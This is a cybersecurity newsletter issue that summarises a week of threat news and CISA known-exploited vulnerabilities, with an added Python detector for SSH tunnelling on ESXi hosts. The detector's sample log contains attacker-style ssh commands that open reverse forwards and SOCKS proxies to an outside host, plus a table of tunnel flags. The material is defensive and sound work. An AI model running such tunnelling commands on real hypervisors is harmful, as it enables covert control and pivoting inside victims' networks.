Cyber Threat Weekly – #62
The week of January 20th through January 26th, around 369 cyber news articles were reviewed. A light amount of cyber threat trends and adversarial behavior news to share. Fundamentals performed with excellence wins championships.
In the case of cybersecurity, fundamentals performed with excellence can minimize organizational impact from cyber-attacks. Simplicity and principle-based security applied to everything is the key to good risk management.
Let’s start with ransomware affiliates abusing ESXi via SSH tunnels. Complex but doable: Windows RID hijacking to create a hidden admin account. The X-Force Cloud Threat Landscape Report 2024. Researchers share Palo Alto firewall bugs.
New fake web pages abusing popular brands Reddit and WeTransfer. Threat actors chaining multiple Ivanti bugs in Cloud Service Appliances (CSA). New BackConnect (BC) malware linked to QakBot, with some enhancements.
Looking back at the ransomware threat landscape in 2024.
Broken Record Alert: Please patch N-day bugs!!!
Known exploited software flaws are one of the top 5 initial access vectors. We continue to share n-day vulnerabilities being actively exploited. You can prioritize starting with the CISA known exploited vulnerability (KEV) catalog.
A close #2 priority is flaws with weaponized proof of concept (PoC) code available. Exploit chances are higher when weaponized PoC code is available. If you do nothing else with patching, have an emergency 24-to-48-hour patching process for vulnerabilities that are actively exploited or have weaponized PoC code available.
You should consider what is exposed to the Internet. Architecture and zero trust network access (ZTNA) can go a long way to minimizing the number of devices exposed to the Internet.
CISA Known Exploited Vulnerabilities – January 20th to January 26th:
CVE-2020-11023 – jQuery Cross-Site Scripting (XSS) Vulnerability:
When passing maliciously formed, untrusted input enclosed in HTML tags, jQuery's DOM manipulators can execute untrusted code in the context of the user's browser.
CVE-2025-23006 – SonicWall SMA1000 Appliances Deserialization Vulnerability:
Affecting the SonicWall SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC), this flaw can enable a remote, unauthenticated attacker to execute arbitrary OS commands.
ESXi Abused via SSH Tunnels by Ransomware Affiliates
Ransomware threat actors are using SSH for persistence and defense evasion by abusing ESXi infrastructure. They build an SSH tunnel with a SOCKS proxy for command and control and as a network pivot. One would think VMware infrastructure would be considered critical, at least the host server itself at a minimum. Proper egress filtering, access controls, logging and monitoring would minimize an adversary’s ability to abuse this attack vector.
https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/
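One way to put the "logging and monitoring" advice above into practice, as an added example that is not from the newsletter or the Sygnia write-up: scan ESXi shell history for ssh invocations that request port forwarding. The log lines are constructed, and their field layout (timestamp, shell[pid], [user], command) is an assumption about how ESXi's /var/log/shell.log is formatted.

```python
import re
import shlex

# Constructed sample lines in the style of ESXi's /var/log/shell.log, which
# records commands run in the ESXi Shell (exact field layout is an assumption).
SAMPLE_SHELL_LOG = """\
2025-01-21T02:13:07Z shell[2010]: [root]: esxcli network firewall get
2025-01-21T02:14:40Z shell[2010]: [root]: ssh -fN -R 9000:127.0.0.1:22 ops@198.51.100.7
2025-01-21T02:15:02Z shell[2010]: [root]: ssh -D 1080 -C -N -f ops@198.51.100.7
2025-01-21T02:16:11Z shell[2010]: [root]: ssh -i /tmp/k -L 8443:10.0.0.5:443 ops@198.51.100.7
2025-01-21T03:01:00Z shell[2033]: [root]: vim-cmd vmsvc/getallvms
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+shell\[\d+\]:\s+\[(?P<user>[^\]]+)\]:\s+(?P<cmd>.+)$")

# OpenSSH single-letter options that set up port forwarding or a tun device;
# -R and -D are the ones that give an intruder a reverse channel or SOCKS pivot.
TUNNEL_FLAGS = {"R": "reverse forward", "D": "dynamic SOCKS proxy",
                "L": "local forward", "w": "tun device"}


def tunnel_kinds(cmd: str) -> list:
    """Return the forwarding kinds an ssh command line requests (empty if none)."""
    try:
        argv = shlex.split(cmd)
    except ValueError:          # unbalanced quotes: not a parsable ssh invocation
        return []
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return []
    kinds = []
    for arg in argv[1:]:
        if arg.startswith("-") and not arg.startswith("--"):
            # Combined short options such as -fNR are inspected letter by letter.
            kinds += [TUNNEL_FLAGS[c] for c in arg[1:] if c in TUNNEL_FLAGS]
    return kinds


def find_ssh_tunnels(log_text: str) -> list:
    """Scan shell.log text; return one dict per ssh command that builds a tunnel."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        kinds = tunnel_kinds(m["cmd"])
        if kinds:
            # Remote endpoint is the user@host token; the forward spec never has '@'.
            dest = next((a for a in reversed(m["cmd"].split()) if "@" in a), "")
            findings.append({"ts": m["ts"], "user": m["user"], "kinds": kinds,
                             "dest": dest, "cmd": m["cmd"]})
    return findings
```

On a host where nobody should be opening outbound SSH from the hypervisor, any finding is worth an alert; the destination field is what you then check against egress filtering rules.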
Hidden Windows Admin Account via RID Hijacking
While this attack vector takes some effort, it is being accomplished. The goal is a hidden, low-privileged account with admin access that is difficult to detect. An existing user account, the guest account, or a new account can be utilized.
https://asec.ahnlab.com/en/85942/
X-Force Cloud Threat Landscape Report 2024
Researchers share various aspects of cloud security and the metrics that were observed. Infostealers are abundant, and so are stolen cloud credentials. Security rule failures are listed for both 100% cloud environments and hybrid environments.
https://www.ibm.com/downloads/documents/us-en/10a99803d4afd20a
Researchers Found Palo Alto Firewall UEFI Firmware Bugs
Using purchased Palo Alto PA-3260, PA-1410, and PA-415 firewalls, researchers tested for bugs. They found UEFI bugs, though abusing them first requires exploiting a vulnerability to reach them. Following secure management interface best practices can minimize impact.
https://www.csoonline.com/article/3809061/palo-alto-networks-firewalls-have-uefi-flaws-secure-boot-bypasses.html
https://eclypsium.com/research/pandoras-box-vulns-in-security-appliances/
Fake Reddit and WeTransfer Pages Distribute LummaStealer
Same behavior, different lures. Abusing popular brands adds to legitimacy, helping threat actors snare more victims. Social engineering continues to be a hot tactic. The researcher is not sure how victims reach the fake pages, but most likely via malvertising, SEO poisoning, direct messages, and other social engineering behavior.
Ivanti Bugs Chained to Pwn Ivanti Cloud Service Appliance (CSA)
CISA and the FBI released an advisory detailing multiple bugs used to gain access, steal credentials, run code, and install webshells on CSA 4.6, which is End-of-Life (EoL). There are four bugs and two different chains. Behavior and indicators of compromise are shared. Lifecycle management is important; minimize the use of unsupported infrastructure.
https://www.darkreading.com/vulnerabilities-threats/cisa-ivanti-vulns-chained-attacks
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-022a
New Enhanced BackConnect (BC) Malware Linked to QakBot
Researchers revealed a new BC malware that has references to Qbot in the code. The BC module was observed on infrastructure delivering Zloader, another malware loader recently used by the Black Basta ransomware gang.
https://thehackernews.com/2025/01/qakbot-linked-bc-malware-adds-enhanced.html
https://medium.com/walmartglobaltech/qbot-is-back-connect-2d774052369f
2024 Reflection of the Ransomware Threat Landscape
Researchers share the top affiliate programs and noteworthy ransomware gangs. Of interest is the overlapping heat map of ransomware threat actor TTPs, showing many commonalities of behavior across multiple affiliates.
31337 InfoSec - Cyber Threat Weekly - Derek Krein Newsletter